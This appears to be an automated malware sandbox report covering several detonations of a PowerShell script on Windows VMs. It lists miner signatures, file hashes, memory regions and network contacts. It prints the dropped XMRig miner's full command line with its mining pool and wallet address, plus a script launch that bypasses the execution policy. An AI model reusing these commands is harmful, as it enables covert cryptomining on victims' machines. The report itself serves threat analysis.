SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/308-25-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/308-48-0x000001973F230000-0x000001973F242000-memory.dmp

memory/308-61-0x000001973F220000-0x000001973F22A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4304-90-0x0000025DB1B90000-0x0000025DB1BB0000-memory.dmp

memory/4304-91-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/308-92-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/4304-93-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/308-94-0x00007FF85FEF3000-0x00007FF85FEF4000-memory.dmp

memory/308-95-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/308-96-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/4304-97-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-98-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-99-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-100-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-101-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-102-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-103-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-104-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-105-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-106-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-107-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-108-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-109-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-110-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-111-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-112-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-113-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-114-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-115-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-116-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-117-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-118-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-119-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-120-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-121-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-122-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-123-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-124-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-125-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-126-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-127-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-128-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-129-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-130-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-131-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-132-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-133-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-134-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-135-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-136-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-137-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-138-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-139-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-140-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-141-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-142-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-143-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-144-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-145-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-146-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-147-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-148-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-149-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-150-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-151-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-152-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-153-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-154-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-155-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-156-0x00007FF61F920000-0x00007FF620553000-memory.dmp

memory/4304-157-0x00007FF61F920000-0x00007FF620553000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:47

Platform

win11-20240508-en

Max time kernel

1798s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1208-0-0x00007FFB728F3000-0x00007FFB728F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1qvhx0n2.llq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1208-9-0x0000029F31230000-0x0000029F31252000-memory.dmp

memory/1208-10-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/1208-11-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/1208-12-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/1208-14-0x0000029F49820000-0x0000029F49832000-memory.dmp

memory/1208-15-0x0000029F312C0000-0x0000029F312CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4848-46-0x000001847FCB0000-0x000001847FCD0000-memory.dmp

memory/4848-47-0x0000018411B10000-0x0000018411B30000-memory.dmp

memory/4848-48-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-51-0x0000018411F50000-0x0000018411F70000-memory.dmp

memory/4848-50-0x0000018412180000-0x00000184121A0000-memory.dmp

memory/1208-49-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4848-52-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/1208-53-0x00007FFB728F3000-0x00007FFB728F5000-memory.dmp

memory/4848-54-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-55-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-56-0x0000018412180000-0x00000184121A0000-memory.dmp

memory/4848-57-0x0000018411F50000-0x0000018411F70000-memory.dmp

memory/4848-58-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-59-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-60-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-61-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-62-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-63-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-64-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-65-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-66-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-67-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-68-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-69-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-70-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-71-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-72-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-73-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-74-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-75-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-76-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-77-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-78-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-79-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-80-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-81-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-82-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-83-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-84-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-85-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-86-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-87-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-88-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-89-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-90-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-91-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-92-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-93-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-94-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-95-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-96-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-97-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-98-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-99-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-100-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-101-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-102-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-103-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-104-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-105-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-106-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-107-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-108-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-109-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-110-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-111-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-112-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-113-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-114-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-115-0x00007FF782760000-0x00007FF783393000-memory.dmp

memory/4848-116-0x00007FF782760000-0x00007FF783393000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.22:443 tcp

Files

memory/3800-0-0x00007FFF21033000-0x00007FFF21035000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i0ebnzo1.o54.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3800-9-0x0000027766920000-0x0000027766942000-memory.dmp

memory/3800-10-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3800-11-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3800-12-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3800-14-0x0000027766F40000-0x0000027766F52000-memory.dmp

memory/3800-15-0x0000027766F20000-0x0000027766F2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1676-46-0x00000166CB330000-0x00000166CB350000-memory.dmp

memory/1676-47-0x00000166CB390000-0x00000166CB3B0000-memory.dmp

memory/1676-48-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/3800-49-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3800-50-0x00007FFF21033000-0x00007FFF21035000-memory.dmp

memory/3800-51-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/1676-54-0x00000166CB3B0000-0x00000166CB3D0000-memory.dmp

memory/1676-53-0x00000166CB3D0000-0x00000166CB3F0000-memory.dmp

memory/1676-52-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/3800-55-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/1676-56-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-57-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-58-0x00000166CB3D0000-0x00000166CB3F0000-memory.dmp

memory/1676-59-0x00000166CB3B0000-0x00000166CB3D0000-memory.dmp

memory/1676-60-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-61-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-62-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-63-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-64-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-65-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-66-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-67-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-68-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-69-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-70-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-71-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-72-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-73-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-74-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-75-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-76-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-77-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-78-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-79-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-80-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-81-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-82-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-83-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-84-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-85-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-86-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-87-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-88-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-89-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-90-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-91-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-92-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-93-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-94-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-95-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-96-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-97-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-98-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-99-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-100-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-101-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-102-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-103-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-104-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-105-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-106-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-107-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-108-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-109-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-110-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-111-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-112-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-113-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-114-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-115-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-116-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-117-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

memory/1676-118-0x00007FF6D95E0000-0x00007FF6DA213000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
